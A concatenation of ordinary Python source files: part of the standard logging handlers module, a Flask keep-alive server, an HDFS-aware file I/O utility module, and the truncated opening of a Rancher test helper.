self.mailhost, self.mailport = mailhost, None
if isinstance(credentials, (list, tuple)):
self.username, self.password = credentials
else:
self.username = None
self.fromaddr = fromaddr
if isinstance(toaddrs, str):
toaddrs = [toaddrs]
self.toaddrs = toaddrs
self.subject = subject
self.secure = secure
self.timeout = timeout
def getSubject(self, record):
"""
Determine the subject for the email.
If you want to specify a subject line which is record-dependent,
override this method.
"""
return self.subject
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
"""
try:
import smtplib
from email.message import EmailMessage
import email.utils
port = self.mailport
if not port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port, timeout=self.timeout)
msg = EmailMessage()
msg['From'] = self.fromaddr
msg['To'] = ','.join(self.toaddrs)
msg['Subject'] = self.getSubject(record)
msg['Date'] = email.utils.localtime()
msg.set_content(self.format(record))
if self.username:
if self.secure is not None:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.send_message(msg)
smtp.quit()
except Exception:
self.handleError(record)
class NTEventLogHandler(logging.Handler):
"""
A handler class which sends events to the NT Event Log. Adds a
registry entry for the specified application name. If no dllname is
provided, win32service.pyd (which contains some basic message
placeholders) is used. Note that use of these placeholders will make
your event logs big, as the entire message source is held in the log.
If you want slimmer logs, you have to pass in the name of your own DLL
which contains the message definitions you want to use in the event log.
"""
def __init__(self, appname, dllname=None, logtype="Application"):
logging.Handler.__init__(self)
try:
import win32evtlogutil, win32evtlog
self.appname = appname
self._welu = win32evtlogutil
if not dllname:
dllname = os.path.split(self._welu.__file__)
dllname = os.path.split(dllname[0])
dllname = os.path.join(dllname[0], r'win32service.pyd')
self.dllname = dllname
self.logtype = logtype
self._welu.AddSourceToRegistry(appname, dllname, logtype)
self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
self.typemap = {
logging.DEBUG : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.INFO : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.WARNING : win32evtlog.EVENTLOG_WARNING_TYPE,
logging.ERROR : win32evtlog.EVENTLOG_ERROR_TYPE,
logging.CRITICAL: win32evtlog.EVENTLOG_ERROR_TYPE,
}
except ImportError:
print("The Python Win32 extensions for NT (service, event "\
"logging) appear not to be available.")
self._welu = None
def getMessageID(self, record):
"""
Return the message ID for the event record. If you are using your
own messages, you could do this by having the msg passed to the
logger being an ID rather than a formatting string. Then, in here,
you could use a dictionary lookup to get the message ID. This
version returns 1, which is the base message ID in win32service.pyd.
"""
return 1
def getEventCategory(self, record):
"""
Return the event category for the record.
Override this if you want to specify your own categories. This version
returns 0.
"""
return 0
def getEventType(self, record):
"""
Return the event type for the record.
Override this if you want to specify your own types. This version does
a mapping using the handler's typemap attribute, which is set up in
__init__() to a dictionary which contains mappings for DEBUG, INFO,
WARNING, ERROR and CRITICAL. If you are using your own levels you will
either need to override this method or place a suitable dictionary in
the handler's typemap attribute.
"""
return self.typemap.get(record.levelno, self.deftype)
def emit(self, record):
"""
Emit a record.
Determine the message ID, event category and event type. Then
log the message in the NT event log.
"""
if self._welu:
try:
id = self.getMessageID(record)
cat = self.getEventCategory(record)
type = self.getEventType(record)
msg = self.format(record)
self._welu.ReportEvent(self.appname, id, cat, type, [msg])
except Exception:
self.handleError(record)
def close(self):
"""
Clean up this handler.
You can remove the application name from the registry as a
source of event log entries. However, if you do this, you will
not be able to see the events as you intended in the Event Log
Viewer - it needs to be able to access the registry to get the
DLL name.
"""
#self._welu.RemoveSourceFromRegistry(self.appname, self.logtype)
logging.Handler.close(self)
class HTTPHandler(logging.Handler):
"""
A class which sends records to a Web server, using either GET or
POST semantics.
"""
def __init__(self, host, url, method="GET", secure=False, credentials=None,
context=None):
"""
Initialize the instance with the host, the request URL, and the method
("GET" or "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
if method not in ["GET", "POST"]:
raise ValueError("method must be GET or POST")
if not secure and context is not None:
raise ValueError("context parameter only makes sense "
"with secure=True")
self.host = host
self.url = url
self.method = method
self.secure = secure
self.credentials = credentials
self.context = context
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
that is sent as the CGI data. Overwrite in your class.
Contributed by Franz Glasner.
"""
return record.__dict__
def emit(self, record):
"""
Emit a record.
Send the record to the Web server as a percent-encoded dictionary
"""
try:
import http.client, urllib.parse
host = self.host
if self.secure:
h = http.client.HTTPSConnection(host, context=self.context)
else:
h = http.client.HTTPConnection(host)
url = self.url
data = urllib.parse.urlencode(self.mapLogRecord(record))
if self.method == "GET":
if (url.find('?') >= 0):
sep = '&'
else:
sep = '?'
url = url + "%c%s" % (sep, data)
h.putrequest(self.method, url)
# support multiple hosts on one IP address...
# need to strip optional :port from host, if present
i = host.find(":")
if i >= 0:
host = host[:i]
h.putheader("Host", host)
if self.method == "POST":
h.putheader("Content-type",
"application/x-www-form-urlencoded")
h.putheader("Content-length", str(len(data)))
if self.credentials:
import base64
s = ('%s:%s' % self.credentials).encode('utf-8')
s = 'Basic ' + base64.b64encode(s).strip().decode('ascii')
h.putheader('Authorization', s)
h.endheaders()
if self.method == "POST":
h.send(data.encode('utf-8'))
h.getresponse() #can't do anything with the result
except Exception:
self.handleError(record)
class BufferingHandler(logging.Handler):
"""
A handler class which buffers logging records in memory. Whenever each
record is added to the buffer, a check is made to see if the buffer should
be flushed. If it should, then flush() is expected to do what's needed.
"""
def __init__(self, capacity):
"""
Initialize the handler with the buffer size.
"""
logging.Handler.__init__(self)
self.capacity = capacity
self.buffer = []
def shouldFlush(self, record):
"""
Should the handler flush its buffer?
Returns true if the buffer is up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
return (len(self.buffer) >= self.capacity)
def emit(self, record):
"""
Emit a record.
Append the record. If shouldFlush() tells us to, call flush() to process
the buffer.
"""
self.buffer.append(record)
if self.shouldFlush(record):
self.flush()
def flush(self):
"""
Override to implement custom flushing behaviour.
This version just zaps the buffer to empty.
"""
self.acquire()
try:
self.buffer = []
finally:
self.release()
def close(self):
"""
Close the handler.
This version just flushes and chains to the parent class' close().
"""
try:
self.flush()
finally:
logging.Handler.close(self)
class MemoryHandler(BufferingHandler):
"""
A handler class which buffers logging records in memory, periodically
flushing them to a target handler. Flushing occurs whenever the buffer
is full, or when an event of a certain severity or greater is seen.
"""
def __init__(self, capacity, flushLevel=logging.ERROR, target=None):
"""
Initialize the handler with the buffer size, the level at which
flushing should occur and an optional target.
Note that without a target being set either here or via setTarget(),
a MemoryHandler is no use to anyone!
"""
BufferingHandler.__init__(self, capacity)
self.flushLevel = flushLevel
self.target = target
def shouldFlush(self, record):
"""
Check for buffer full or a record at the flushLevel or higher.
"""
return (len(self.buffer) >= self.capacity) or \
(record.levelno >= self.flushLevel)
def setTarget(self, target):
"""
Set the target handler for this handler.
"""
self.target = target
def flush(self):
"""
For a MemoryHandler, flushing means just sending the buffered
records to the target, if there is one. Override if you want
different behaviour.
The record buffer is also cleared by this operation.
"""
self.acquire()
try:
if self.target:
for record in self.buffer:
self.target.handle(record)
self.buffer = []
finally:
self.release()
def close(self):
"""
Flush, set the target to None and lose the buffer.
"""
try:
self.flush()
finally:
self.acquire()
try:
self.target = None
BufferingHandler.close(self)
finally:
self.release()
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy pasted into
user code for use with earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also puts the message into
# record.message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info attribute, as it's no longer needed and, if not None,
# will typically not be pickleable.
self.format(record)
record.msg = record.message
record.args = None
record.exc_info = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except Exception:
self.handleError(record)
if threading:
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
"""
_sentinel = None
def __init__(self, queue, *handlers, respect_handler_level=False):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._thread = None
self.respect_handler_level = respect_handler_level
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses get. You may want to override this method
if you want to use timeouts or work with custom queue implementations.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.daemon = True
t.start()
def prepare(self , record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
if not self.respect_handler_level:
process = True
else:
process = record.levelno >= handler.level
if process:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while True:
try:
record = self.dequeue(True)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def enqueue_sentinel(self):
"""
This is used to enqueue the sentinel record.
The base implementation uses put_nowait. You may want to override this
method if you want to use timeouts or work with custom queue
implementations.
"""
self.queue.put_nowait(self._sentinel)
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self.enqueue_sentinel()
self._thread.join()
self._thread = None
|
keep_alive.py | from flask import Flask
from threading import Thread
app = Flask('')
port=8080
@app.route('/')
def home():
return "Server is currently running"
def run():
app.run(host='0.0.0.0',port=port)
def keep_alive():
t = Thread(target=run)
t.start() |
io.py | from io import IOBase, TextIOBase
from multiprocessing import Process
import os
import sys
import re
import time
import json
import subprocess
import random
import logging
logger = logging.getLogger(__name__)
from paragen.utils.runtime import Environment
SPACE_NORMALIZER = re.compile("\s+")
TEMP_IO_SAVE_PATH = ""
def init_io():
global TEMP_IO_SAVE_PATH
try:
TEMP_IO_SAVE_PATH = os.path.join(os.getenv('HOME'), '.cache/uio/')
except Exception:
TEMP_IO_SAVE_PATH = os.path.join(os.getcwd(), '.cache_uio/')
if not os.path.exists(TEMP_IO_SAVE_PATH):
os.makedirs(TEMP_IO_SAVE_PATH, exist_ok=True)
def clear_cache():
global TEMP_IO_SAVE_PATH
output = subprocess.run('lsof +d {}'.format(TEMP_IO_SAVE_PATH).split(), capture_output=True)
occupied = str(output.stdout, encoding='utf8').split('\n')
occupied = set([filepath for filepath in occupied if filepath])
for name in os.listdir(TEMP_IO_SAVE_PATH):
filename = os.path.join(TEMP_IO_SAVE_PATH, name)
if filename not in occupied:
try:
os.remove(filename)
except:
pass
init_io()
def _run_cmd(args_list):
"""
run linux commands
"""
proc = subprocess.Popen(args_list, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
s_output, s_err = proc.communicate()
s_return = proc.returncode
return s_return, s_output, s_err
def parse_single_path(path):
"""
Parse path with regular expression
Args:
path: input path
Returns:
- parse path list
"""
def _get_files(path):
return [f for f in listdir(path, return_files=True, return_dirs=False)]
if path.endswith('*'):
path = path.split('/')
pathdir, pathprefix = '/'.join(path[:-1]), path[-1][:-1]
files = ['{}/{}'.format(pathdir, f) for f in _get_files(pathdir) if f.startswith(pathprefix)]
elif isdir(path):
files = ['{}/{}'.format(path, f) for f in _get_files(path)]
else:
files = [path]
random.shuffle(files)
return files
def parse_path(path):
files = []
for singlepath in path.strip().split(','):
if singlepath:
files += parse_single_path(singlepath)
return files
def read_vocab(path):
"""
Read a vocab
Args:
path: path to restore vocab
Returns:
- a dict of frequency table
"""
freq = []
with UniIO(path, 'r') as fin:
for line in fin:
line = line.strip('\n')
line = SPACE_NORMALIZER.split(line)
freq.append((' '.join(line[:-1]), int(line[-1])))
return freq
def read_table(path):
"""
Read a table
Args:
path: path to restore table
Returns:
- a dict of table
"""
table = {}
with UniIO(path, 'r') as fin:
for line in fin:
line = line.strip('\n')
line = SPACE_NORMALIZER.split(line)
table[' '.join(line[:-1])] = line[-1]
return table
def read_list(path):
"""
Read a list
Args:
path: path to restore list
Returns:
- a list
"""
with UniIO(path, 'r') as fin:
freq = [line.strip('\n') for line in fin]
return freq
def jsonable(x):
"""
Check if x is suit json.dumps
"""
try:
json.dumps(x)
return True
except (TypeError, OverflowError):
return False
def listdir(path, return_files=True, return_dirs=False, retry=5):
"""
Given a path, return a list of files under this path
:param path: directory
:return: a list of files / dirs
"""
def _listdir(path):
retval = list()
returncode = 1
for i in range(retry):
if path.startswith('hdfs:'):
output = subprocess.run('hadoop fs -ls {}'.format(path).split(), capture_output=True)
returncode = output.returncode
output = output.stdout
output = str(output, encoding='utf8').split('\n')
getname = lambda x: x.split('/')[-1]
if return_files:
retval += [getname(f) for f in output if f.startswith('-')]
if return_dirs:
retval += [getname(f) for f in output if f.startswith('d')]
else:
output = subprocess.run('ls -A -H -l {}'.format(path).split(), capture_output=True)
returncode = output.returncode
output = output.stdout
output = str(output, encoding='utf8').split('\n')
getname = lambda x: x.split(' ')[-1]
if return_files:
retval += [getname(f) for f in output if f.startswith('-')]
if return_dirs:
retval += [getname(f) for f in output if f.startswith('d')]
if returncode == 0:
break
if returncode != 0:
logger.warning(f'fail to listdir {path}')
return retval
if path:
return _listdir(path)
else:
raise ValueError
def isdir(path):
"""
Check if a path if a directory
:param path: path to check
:return:
"""
if path.startswith('hdfs:'):
output = subprocess.run('hadoop fs -test -d {}'.format(path).split(), capture_output=True)
return output.returncode == 0
else:
return os.path.isdir(path)
def wait_until_exist(path, timeout=10000):
start = time.time()
while True:
if exists(path):
return True
if time.time() - start > timeout:
logger.warning(f"timeout: {path} not found!")
return False
time.sleep(5)
def cp(src, tgt, retry=5, wait=False):
"""
Copy a file from src to tgt
:param src: source file / directory
:param tgt: target file / directory
:return:
"""
def _cp(src, tgt):
if not wait_until_exist(src):
logger.info(f'timeout: {src} not found')
return
returncode = 1
for i in range(retry):
if exists(tgt):
remove(tgt, wait=True)
if src.startswith('hdfs:') and tgt.startswith('hdfs:'):
output = subprocess.run(["hadoop", "fs", "-cp", src, tgt], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
elif src.startswith('hdfs:') and not tgt.startswith('hdfs:'):
output = subprocess.run(["hadoop", "fs", "-get", src, tgt], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
elif not src.startswith('hdfs:') and tgt.startswith('hdfs:'):
output = subprocess.run(["hadoop", "fs", "-put", src, tgt], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
else:
output = subprocess.run(["cp", src, tgt], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
returncode = output.returncode
if returncode == 0:
logger.info(f'successfully copy from {src} to {tgt}')
break
if returncode != 0:
logger.warning(f'copy from {src} to {tgt} fails')
env = Environment()
if env.is_master():
if wait:
_cp(src, tgt)
else:
Process(target=_cp, args=(src, tgt)).start()
def mkdir(path, retry=5, wait=True):
"""
Create a directory at path
:param path: path to directory
:return:
"""
def _mkdir(path):
returncode = 1
for i in range(retry):
if path.startswith('hdfs:'):
output = subprocess.run(["hadoop", "fs", "-mkdir", "-p", path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
else:
output = subprocess.run(["mkdir", "-p", path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
returncode = output.returncode
if returncode == 0:
logger.info(f'successfully make directory: {path}')
break
if returncode != 0:
logger.warning(f'mkdir {path} fails')
env = Environment()
if env.is_master() and path:
if wait:
_mkdir(path)
else:
Process(target=_mkdir, args=(path,)).start()
def remove(path, retry=5, wait=False):
"""
Remove a directory or file
:param path: path to remove
:return:
"""
def _remove(path):
if exists(path):
returncode = 1
for i in range(retry):
if path.startswith('hdfs:'):
output = subprocess.run(['hadoop', 'fs', '-rm', path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
else:
output = subprocess.run(['rm', path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
returncode = output.returncode
if returncode == 0:
logger.info(f'successfully remove file: {path}')
break
if returncode != 0:
logger.warning(f'remove file {path} fails')
env = Environment()
if env.is_master() and path:
if wait:
_remove(path)
else:
Process(target=_remove, args=(path,)).start()
def exists(path):
"""
check if path exists
:param path: path to check
:return:
"""
if path.startswith('hdfs:'):
r = subprocess.run(['hadoop', 'fs', '-stat', path], capture_output=True)
return True if r.returncode == 0 else False
else:
return os.path.exists(path)
def not_exist(paths):
for p in paths:
if not exists(p):
return p
return None
def remove_tree(path, retry=5, wait=True):
"""
remove directory recursively
:param path: path to remove
:return
"""
def _rmtree(path):
returncode = 1
for i in range(retry):
if path.startswith('hdfs:'):
output = subprocess.run(['hadoop', 'fs', '-rm', '-r', path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
else:
output = subprocess.run(['rm', '-r', path], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
returncode = output.returncode
if returncode == 0:
logger.info(f'successfully remove directory: {path}')
break
if returncode != 0:
logger.warning(f'remove directory {path} fails')
env = Environment()
if env.is_master() and path:
if wait:
_rmtree(path)
else:
Process(target=_rmtree, args=(path,)).start()
def create_data_map(path):
"""
read a data map from path
"""
data_map = []
with UniIO(path) as fin:
data_position = 0
for i, line in enumerate(fin):
d = json.loads(line)
token_num = d['token_num'] if 'token_num' in d else 1
data_map.append((i, data_position, token_num))
data_position += len(line)
return data_map
def utf8len(s):
"""
Get the byte number of the utf-8 sentence.
"""
return len(s.encode('utf-8'))
def _InputFileOpen(path, mode='r', encoding='utf8', timeout=-1, poll_interval=0.1, *args, **kwargs):
try:
if path.startswith('hdfs:'):
if 'localpath' in kwargs:
localpath = kwargs['localpath']
else:
localpath = TEMP_IO_SAVE_PATH + re.sub(r'[^\w]', '', path)
lockfilename = localpath + '.lock' # Multiprocess may read the file; they share the same cached file;
# They need to wait until it is downloaded completely
if not os.path.exists(lockfilename): # acquire lock
fd = os.open(lockfilename, os.O_WRONLY | os.O_CREAT | os.O_TRUNC) # lock
if os.path.exists(localpath):
os.remove(localpath)
p = subprocess.run("hadoop fs -get {} {}".format(path, localpath).split(),
capture_output=True)
if p.returncode:
logger.warning(f'failed to open {path}, hadoop fs return code: {p.returncode}')
os.close(fd)
os.remove(lockfilename) # release lock
else:
start = time.time()
while True: # Wait until the file is released (finished downloading)
if not os.path.exists(lockfilename):
break
if timeout >= 0 and time.time() - start > timeout:
logger.warning(f'failed to open {path}, file is locked, timeout')
break
time.sleep(poll_interval)
else:
localpath = path
if 'b' in mode.lower():
istream = open(localpath, mode=mode)
else:
istream = open(localpath, mode=mode, encoding=encoding)
# logger.info(f'successfully open file: {path}')
return istream
except Exception as e:
logger.warning(f'open file {path} fails: {e}')
return None
class _InputStream(TextIOBase):
"""
A InputSteam wrapper to tackle with multiple files input
"""
def __init__(self, path, encoding='utf8'):
super().__init__()
self._paths = parse_path(path)
_hash = hash(''.join(self._paths + [str(os.getpid())]))
_hash &= sys.maxsize
self._localpath = os.path.join(TEMP_IO_SAVE_PATH, str(_hash))
self._encoding = encoding
self._idx = -1
self._fin = None
self._next_file()
def _next_file(self):
if self._fin is not None:
self._fin.close()
self._idx += 1
if 0 <= self._idx < len(self._paths):
self._fin = _InputFileOpen(self._paths[self._idx], mode='r', encoding=self._encoding, localpath=self._localpath)
if self._fin is None:
self._next_file()
else:
raise StopIteration
def reset(self):
self._idx = -1
self._next_file()
def close(self):
if self._fin is not None:
self._fin.close()
super().close()
def __iter__(self):
return self
def __next__(self):
try:
if self._idx >= len(self._paths):
raise IndexError
return next(self._fin)
except StopIteration:
try:
self._next_file()
return self.__next__()
except Exception as e:
raise e
except IndexError:
raise StopIteration
def readline(self, size=-1):
if self._fin is None or self._fin.closed:
return ''
sample = self._fin.readline(size)
if sample:
return sample
try:
self._next_file()
return self.readline(size)
except StopIteration:
return ''
def readlines(self, hint=-1):
retval = []
total_size = 0
while hint is None or hint <= 0 or total_size <= hint:
line = self.readline()
if line:
retval.append(line)
total_size += len(line)
else:
break
return retval
def read(self, size=-1):
if self._fin is None or self._fin.closed:
return ''
if size == -1:
buffer = ''
while True:
buffer += self._fin.read()
try:
self._next_file()
except StopIteration:
break
return buffer
else:
buffer = ['' for i in range(size)]
offset = 0
while size > 0:
filesize = self._size(self._fin)
if filesize <= size:
buffer[offset : offset + filesize] = self._fin.read()
offset += filesize
size -= filesize
try:
self._next_file()
except StopIteration:
break
else:
buffer[offset : ] = self._fin.read(size)
size = 0
buffer = ''.join(buffer)
return buffer
def seek(self, offset, whence=os.SEEK_SET):
if whence == os.SEEK_SET:
if offset < 0:
raise OSError(22, 'Invalid argument')
self.reset()
_offset = offset
while offset > 0:
size = self._size(self._fin)
if offset <= size:
self._fin.seek(offset, os.SEEK_SET)
offset = 0
else:
offset -= size
try:
self._next_file()
except StopIteration:
break
return _offset
elif whence == os.SEEK_CUR:
if offset:
raise ValueError(f'invalid offset {offset}, offset must be zero')
else:
pass # do nothing, according to TextIOBase.seek()
return self.tell()
elif whence == os.SEEK_END:
if offset:
raise ValueError(f'invalid offset {offset}, offset must be zero')
else:
while True:
try:
self._next_file()
except StopIteration:
break
return self.tell()
else:
raise ValueError(f'invalid whence ({whence}, should be 0, 1 or 2)')
def tell(self):
return self._fin.tell() # Not a proper implementation
def _size(self, fin):
cur = fin.tell()
tail = fin.seek(0, os.SEEK_END)
size = max(0, tail - cur)
fin.seek(cur, os.SEEK_SET)
return size
def _OutputFileOpen(path, localpath, mode='w', encoding='utf8'):
try:
if path.startswith('hdfs:'):
if not os.path.exists(TEMP_IO_SAVE_PATH):
os.mkdir(TEMP_IO_SAVE_PATH)
else:
localpath = path
if 'b' in mode.lower():
ostream = open(localpath, mode=mode)
else:
ostream = open(localpath, mode=mode, encoding=encoding)
return ostream
except Exception as e:
logger.warning(f'open file {path} fails: {e}')
class _OutputStream(TextIOBase):
"""
OutputStream is an io wrapper to tackle with multiple kinds of path
Args:
path: output file path
"""
def __init__(self, path, encoding='utf8'):
super().__init__()
self._path = path
if self._path.startswith('hdfs:'):
self._localpath = TEMP_IO_SAVE_PATH + re.sub(r'[^\w]', '', '{}_{}_w'.format(path, os.getpid()))
else:
self._localpath = path
self._encoding = encoding
self._fout = _OutputFileOpen(path, self._localpath, encoding=encoding)
def reset(self):
"""
Reset output stream
"""
self._fout.seek(0)
def close(self):
"""
Close output stream
"""
self._fout.close()
if self._path.startswith('hdfs:'):
cp(self._localpath, self._path, wait=True)
wait_until_exist(self._path)
super().close()
def write(self, content):
"""
Write to output stream
Args:
content: str to write
"""
self._fout.write(content)
def writelines(self, content):
"""
Write to output InputStream
Args:
content: list of str
"""
self._fout.writelines(content)
def seek(self, offset, whence=os.SEEK_SET):
"""
The same as TextIOBase.seek()
"""
return self._fout.seek(offset, whence)
def tell(self):
"""
The same as TextIOBase.tell()
"""
return self._fout.tell()
class _InputBytes(IOBase):
"""
InputBytes is an io wrapper to tackle with multiple kinds of path
Args:
path: input file path
"""
def __init__(self, path, mode='rb'):
super().__init__()
self._paths = parse_path(path)
self._fins = [_InputFileOpen(path, mode=mode) for path in self._paths]
self._fins = [item for item in self._fins if item is not None]
self._sizes = [self._size(fin) for fin in self._fins]
self._idx = 0
def __iter__(self):
return self
def __next__(self):
"""
Fetch next line from file. The line terminator is b'\n'.
Returns:
- next line
"""
try:
if self._idx >= len(self._fins):
raise IndexError
sample = next(self._fins[self._idx])
return sample
except StopIteration:
self._idx += 1
sample = self.__next__()
return sample
except IndexError:
raise StopIteration
def reset(self):
"""
Reset input stream
"""
self._idx = 0
for fin in self._fins:
fin.seek(0)
def readline(self, size=-1):
"""
Read the next line. Return b'' at EOF. The line terminator is b'\n'.
Args:
size: read at most `size` bytes
Returns:
- next line
"""
try:
if size == 0:
return b''
if self._idx >= len(self._fins):
raise StopIteration
sample = self._fins[self._idx].readline(size)
if sample:
return sample
self._idx += 1
return self.readline(size)
except StopIteration:
return b''
def readlines(self, hint=-1):
"""
Read all lines and return in a list
Args:
hint: read at most `hint` bytes
Returns:
- list of lines
"""
retval = []
total_size = 0
while hint is None or hint <= 0 or total_size <= hint:
line = self.readline()
if line:
retval.append(line)
total_size += len(line)
else:
break
return retval
def read(self, size=-1):
"""
Read the rest of file
Args:
size: read at most `size` bytes
Returns:
- the rest of file
"""
if size == -1:
buffer = b''
while self._idx < len(self._fins):
buffer += self._fins[self._idx].read()
self._idx += 1
return buffer
else:
buffer = bytearray(size)
offset = 0
while self._idx < len(self._fins) and size > 0:
filesize = self._size(self._fins[self._idx])
if filesize <= size:
buffer[offset : offset + filesize] = self._fins[self._idx].read()
offset += filesize
self._idx += 1
size -= filesize
else:
buffer[offset : ] = self._fins[self._idx].read(size)
size = 0
buffer = bytes(buffer)
return buffer
def _size(self, fin):
# Given a file descriptor, calculate its size
cur = fin.tell()
tail = fin.seek(0, os.SEEK_END)
size = max(0, tail - cur)
fin.seek(cur, os.SEEK_SET)
return size
def tell(self):
"""
Return the absolute current stream position
Returns:
- current stream position
"""
position = 0
if self._idx < len(self._fins):
position += self._fins[self._idx].tell()
for i in range(min(self._idx, len(self._fins))):
position += self._sizes[i]
return position
def seek(self, offset, whence=os.SEEK_SET):
"""
Change the stream position to the given byte offset.
Args:
offset: byte offset
whence: Values for whence are SEEK_SET (0), SEEK_CUR (1) or SEEK_END (2)
Returns:
Stream position after seek
"""
if whence == os.SEEK_SET:
if offset < 0:
raise OSError(22, 'Invalid argument')
return self.seek(offset - self.tell(), whence=os.SEEK_CUR)
if whence == os.SEEK_CUR:
self._idx = max(0, min(len(self._fins) - 1, self._idx))
while self._idx < len(self._fins) and offset > 0:
filesize = self._size(self._fins[self._idx])
if filesize < offset:
self._fins[self._idx].seek(0, os.SEEK_END)
self._idx += 1
offset -= filesize
else:
self._fins[self._idx].seek(offset, os.SEEK_CUR)
offset = 0
while self._idx >= 0 and offset < 0:
filesize = self._fins[self._idx].tell()
if offset + filesize < 0:
self._fins[self._idx].seek(0, os.SEEK_SET)
self._idx -= 1
offset += filesize
else:
self._fins[self._idx].seek(offset, os.SEEK_CUR)
offset = 0
self._idx = max(0, min(len(self._fins) - 1, self._idx))
return self.tell()
if whence == os.SEEK_END:
for i in range(len(self._fins)):
offset += self._sizes[i]
return self.seek(offset, whence=os.SEEK_SET)
raise ValueError(f'invalid whence ({whence}, should be 0, 1 or 2)')
def close(self):
"""
Close the input stream
"""
for fin in self._fins:
fin.close()
super().close()
class _OutputBytes(IOBase):
"""
OutputBytes is an io wrapper to tackle with multiple kinds of path
Args:
path: output file path
"""
def __init__(self, path, mode='wb'):
super().__init__()
self._path = path
self._localpath = TEMP_IO_SAVE_PATH + re.sub(r'[^\w]', '', '{}_{}_w'.format(path, os.getpid()))
self._fout = _OutputFileOpen(path, self._localpath, mode=mode)
def reset(self):
"""
Reset output stream
"""
self._fout.seek(0)
def close(self):
"""
Close output stream
"""
self._fout.close()
if self._path.startswith('hdfs:'):
cp(self._localpath, self._path, wait=True)
wait_until_exist(self._path)
super().close()
def write(self, content):
"""
Write to output Stream
Args:
content: bytes to write
"""
self._fout.write(content)
def seek(self, offset, whence=os.SEEK_SET):
"""
The same as IOBase.seek()
"""
return self._fout.seek(offset, whence)
def tell(self):
"""
The same as IOBase.tell()
"""
return self._fout.tell()
class UniIO(_InputStream, _OutputStream, _InputBytes, _OutputBytes):
"""
A universal IO with the same functions as python:open
"""
def __init__(self, path, mode='r', encoding='utf8'):
pass
def __new__(cls, path, mode='r', encoding='utf8'):
if 'r' in mode.lower():
if 'b' in mode.lower():
return _InputBytes(path, mode=mode)
return _InputStream(path, encoding=encoding)
elif 'w' in mode.lower():
if 'b' in mode.lower():
return _OutputBytes(path, mode=mode)
return _OutputStream(path, encoding=encoding)
logger.warning(f'Not support file mode: {mode}')
raise ValueError
|
common.py | import inspect
import json
import os
import random
import subprocess
import ssl
import time
import requests
import ast
import paramiko
import rancher
import pytest
from urllib.parse import urlparse
from rancher import ApiError
from lib.aws import AmazonWebServices
from copy import deepcopy
from threading import Lock
from threading import Thread
import websocket
import base64
DEFAULT_TIMEOUT = 120
DEFAULT_CATALOG_TIMEOUT = 15
DEFAULT_MONITORING_TIMEOUT = 180
DEFAULT_CLUSTER_STATE_TIMEOUT = 240
DEFAULT_MULTI_CLUSTER_APP_TIMEOUT = 300
DEFAULT_APP_DELETION_TIMEOUT = 360
CATTLE_TEST_URL = os.environ.get('CATTLE_TEST_URL', "")
CATTLE_API_URL = CATTLE_TEST_URL + "/v3"
CATTLE_AUTH_URL = \
CATTLE_TEST_URL + "/v3-public/localproviders/local?action=login"
ADMIN_TOKEN = os.environ.get('ADMIN_TOKEN', "None")
USER_TOKEN = os.environ.get('USER_TOKEN', "None")
USER_PASSWORD = os.environ.get('USER_PASSWORD', "None")
ADMIN_PASSWORD = os.environ.get('ADMIN_PASSWORD', "None")
kube_fname = os.path.join(os.path.dirname(os.path.realpath(__file__)),
